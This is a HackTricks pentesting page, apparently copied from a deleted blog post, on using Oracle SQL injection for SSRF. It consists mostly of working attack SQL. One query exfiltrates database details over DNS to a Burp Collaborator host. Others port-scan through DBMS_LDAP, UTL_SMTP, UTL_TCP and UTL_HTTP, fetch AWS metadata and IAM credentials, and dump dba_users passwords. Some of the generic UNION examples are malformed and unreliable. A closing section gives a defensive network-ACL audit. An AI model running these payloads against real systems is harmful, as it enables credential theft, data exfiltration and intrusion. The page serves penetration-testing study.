# Oracle injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
**This section is a Wayback Machine copy of the deleted post from [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
## SSRF
Using Oracle to make Out of Band HTTP and DNS requests is well documented as a way to exfiltrate data from SQL injections. The same techniques/functions can be modified to perform other SSRF/XSPA.
Installing Oracle can be painful, especially if you just want a quick instance to try commands against. A colleague at [Appsecco](https://appsecco.com), [Abhisek Datta](https://github.com/abhisek), pointed me to [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c), which let me set up an instance on a t2.large AWS Ubuntu machine with Docker.
I ran the Docker command with the `--network="host"` flag so that the container mimics a native Oracle install with full network access, for the purposes of this blogpost.
```bash
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
```
#### Oracle packages that support a URL or a Hostname/Port Number specification
In order to find the Oracle packages and functions that support a **URL** or a **Hostname/Port Number** specification, I ran a Google search restricted to the [**Oracle Database Online Documentation**](https://docs.oracle.com/database/121/index.html). Specifically:
```
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
```
The search returned the following results (not all can be used to perform outbound network)
* DBMS\_NETWORK\_ACL\_ADMIN
* UTL\_SMTP
* DBMS\_XDB
* DBMS\_SCHEDULER
* DBMS\_XDB\_CONFIG
* DBMS\_AQ
* UTL\_MAIL
* DBMS\_AQELM
* DBMS\_NETWORK\_ACL\_UTILITY
* DBMS\_MGD\_ID\_UTL
* UTL\_TCP
* DBMS\_MGWADM
* DBMS\_STREAMS\_ADM
* UTL\_HTTP
This crude search obviously skips packages like `DBMS_LDAP` (which allows passing a hostname and port number) as [the documentation page](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
In any case, let's take a look at some of the packages that we have discovered and listed above.
**DBMS\_LDAP.INIT**
The `DBMS_LDAP` package allows for access of data from LDAP servers. The `init()` function initializes a session with an LDAP server and takes a hostname and port number as an argument.
This function has been documented before to show exfiltration of data over DNS, like below
```sql
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
```
Now that we know we can pass a hostname and port number to this function, let's see whether it can be used as a port scanner.
Here are some examples:
```sql
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
```
An `ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` error shows that the port is closed, while a returned session value shows that the port is open.
**UTL\_SMTP**
The `UTL_SMTP` package is designed for sending e-mail over the SMTP protocol. The [example on the Oracle documentation site](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478) shows how to send an e-mail with it. What interests us, however, is that it takes a host and port specification.
A crude example using the `UTL_SMTP.OPEN_CONNECTION` function with a 2-second timeout is shown below.
```sql
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;
/
```
```sql
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;
/
```
An `ORA-29276: transfer timeout` shows that the port is open but no SMTP connection was established, while an `ORA-29278: SMTP transient error: 421 Service not available` shows that the port is closed.
**UTL\_TCP**
The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.
The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). We can simplify it a little and use it to make requests to the metadata instance, for example, or to an arbitrary TCP/IP service.
```sql
set serveroutput on size 30000;
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
-- raw TCP connection to the instance metadata service with a 2 second timeout
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
-- the empty line terminates the HTTP request headers
retval := utl_tcp.write_line(c);
BEGIN
-- print the response line by line until the server closes the connection
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
```
```sql
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
-- connect to an arbitrary TCP service (here SSH) and read whatever banner it sends
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
```
**UTL\_HTTP and Web Requests**
Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial out there is the [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u\_http.htm#ARPLS070). The documentation defines the package as: `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`
```sql
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
```
**Oracle Injection**
Oracle injection is SQL injection against an Oracle database: attacker-controlled input reaches a query unparameterised and alters the statement. This can lead to unauthorized access, data manipulation, and even complete control over the database.
## Basic Oracle Injection
In Oracle databases, the `UNION` operator combines the results of two or more SELECT statements into a single result set, which can be leveraged to extract data the original query never returned. Note that every Oracle SELECT needs a FROM clause, so constant rows are selected from the `dual` table, and both sides of a UNION must have the same number of columns with compatible types (padding with `NULL` is the usual way to match the column count).
### Extracting Data
To extract data from an Oracle database, you can use the following query:
```sql
SELECT column_name FROM table_name UNION SELECT NULL FROM dual;
```
Replace `column_name` with the name of the column you want to extract data from, and `table_name` with the name of the table.
### Enumerating Tables
To enumerate the tables in an Oracle database, you can use the following query:
```sql
SELECT table_name FROM all_tables UNION SELECT NULL FROM dual;
```
### Enumerating Columns
To enumerate the columns in a specific table, you can use the following query:
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'table_name' UNION SELECT NULL FROM dual;
```
Replace `table_name` with the name of the table you want to enumerate columns from.
### Extracting Usernames and Passwords
To extract usernames and passwords from an Oracle database, you can use the following query:
```sql
SELECT username || ':' || password FROM dba_users UNION SELECT NULL FROM dual;
```
### Performing Port Scanning
You can also use Oracle Injection to perform rudimentary port scanning by leveraging the `UTL_TCP` package in Oracle. This package allows you to create TCP connections and send/receive data.
To perform port scanning, you can use the following query:
```sql
DECLARE
c utl_tcp.connection;
BEGIN
-- tx_timeout bounds how long a filtered port keeps the call hanging
c := utl_tcp.open_connection('target_ip', target_port, tx_timeout => 2);
utl_tcp.close_connection(c);
dbms_output.put_line('open');
EXCEPTION
-- swallowing the error silently would give no result, so report it instead
WHEN OTHERS THEN
dbms_output.put_line('closed or filtered: ' || SQLERRM);
END;
/
```
Replace `target_ip` with the IP address of the target and `target_port` with the port number you want to scan.
Keep in mind that port scanning is a potentially intrusive activity and may be illegal or against the terms of service of the target system. Always ensure you have proper authorization before performing any port scanning activities.
The `UTL_HTTP.request` function can also be pointed at arbitrary ports of a host, and the error it returns reveals whether the TCP port accepted the connection:
```sql
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
```
An `ORA-12541: TNS:no listener` or a `TNS:operation timed out` error is a sign that the TCP port is closed, whereas an `ORA-29263: HTTP protocol error` or returned data is a sign that the port is open.
Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t\_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
```sql
select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
```
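Every package discussed above (`UTL_HTTP`, `UTL_TCP`, `DBMS_LDAP`, `UTL_SMTP`, `HTTPURITYPE`) is subject to Oracle's network ACLs, so the practical defence is to audit who may connect where and to replace blanket grants with narrow ones. The following audit-and-fix is an added example, not code from the original post; it assumes a 12c database, a hypothetical application schema `APP_USER`, and a hypothetical allowed endpoint `api.example.com`.

```sql
-- 1. Audit: every principal that may open outbound connections, and to which hosts/ports.
--    A host of '*' (or a range that covers 169.254.169.254) lets that principal reach
--    the instance metadata service through any of the packages discussed above.
SELECT host, lower_port, upper_port, principal, principal_type, privilege, grant_type
FROM   dba_host_aces
WHERE  LOWER(privilege) IN ('connect', 'resolve')
ORDER  BY host, ace_order;

-- 2. Fix: drop the wildcard grant for the application schema and allow only the
--    single endpoint it actually needs (APP_USER and api.example.com are assumed).
BEGIN
  DBMS_NETWORK_ACL_ADMIN.REMOVE_HOST_ACE(
    host             => '*',
    ace              => xs$ace_type(privilege_list => xs$name_list('connect'),
                                    principal_name => 'APP_USER',
                                    principal_type => xs_acl.ptype_db),
    remove_empty_acl => TRUE);

  DBMS_NETWORK_ACL_ADMIN.APPEND_HOST_ACE(
    host       => 'api.example.com',
    lower_port => 443,
    upper_port => 443,
    ace        => xs$ace_type(privilege_list => xs$name_list('connect'),
                              principal_name => 'APP_USER',
                              principal_type => xs_acl.ptype_db));
END;
/

-- 3. Verify from the application's own session: the metadata address must now fail
--    with ORA-24247 (network access denied by access control list) instead of returning data.
SELECT UTL_HTTP.request('http://169.254.169.254/latest/meta-data/') FROM dual;
```

On 11g the equivalent views are `DBA_NETWORK_ACLS` and `DBA_NETWORK_ACL_PRIVILEGES`; the verification step is the same.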